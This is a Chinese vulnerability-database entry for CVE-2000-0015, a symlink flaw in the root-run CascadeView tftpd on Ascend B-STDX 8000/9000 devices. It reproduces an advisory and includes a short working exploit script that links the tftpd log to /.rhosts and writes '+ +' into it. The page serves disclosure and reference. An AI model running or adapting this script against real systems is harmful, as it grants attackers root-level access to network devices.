CascadeView tftpd权限提升漏洞

CascadeView tftpd权限提升漏洞

漏洞ID 1105668 漏洞类型 边界条件错误
发布时间 1999-12-31 更新时间 2005-05-02
图片[1]-CascadeView tftpd权限提升漏洞-安全小百科CVE编号 CVE-2000-0015
图片[2]-CascadeView tftpd权限提升漏洞-安全小百科CNNVD-ID CNNVD-199912-151
漏洞平台 Unix CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/19707
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-151
|漏洞详情
CascadeViewTFTP服务器存在漏洞。本地用户通过符号链接攻击来提升权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/910/info

The tftpd bundled with CascadeView for Ascend's B-STDX 8000/9000 network devices creates a log in /tmp called tftpd_xfer_status.log. If /tmp/tftpd_xfer_status.log already exists as a symbolic link, tftpd will follow it and overwrite any data it points to (it runs as root). It is possible for an attacker to link the log file to a file like /.rhosts to compromise elevated privileges on the device. It should be made clear that since this is a network device vulnerability, the consequences of compromise could be much greater to the network the device is on as a whole than if it were a single regular host.

#!/bin/sh
#
# tftpserv.sh - Loneguard 07/03/99
#
# Buggy tftp server shipped with CascadeView B-STDX 8000/9000
#
rm /tmp/tftpd_xfer_status.log
ln -s /.rhosts /tmp/tftpd_xfer_status.log
echo KungFu > crazymonkey
( sleep 1 ; echo put crazymonkey ; sleep 1 ; echo quit ) | tftp 127.1
echo "+ +" > /.rhosts
|参考资料

来源:BID
名称:910
链接:http://www.securityfocus.com/bid/910

相关推荐: HP HTTP Server Remote Unspecified Buffer Overflow Vulnerability

HP HTTP Server Remote Unspecified Buffer Overflow Vulnerability 漏洞ID 1097152 漏洞类型 Boundary Condition Error 发布时间 2005-02-15 更新时间 20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享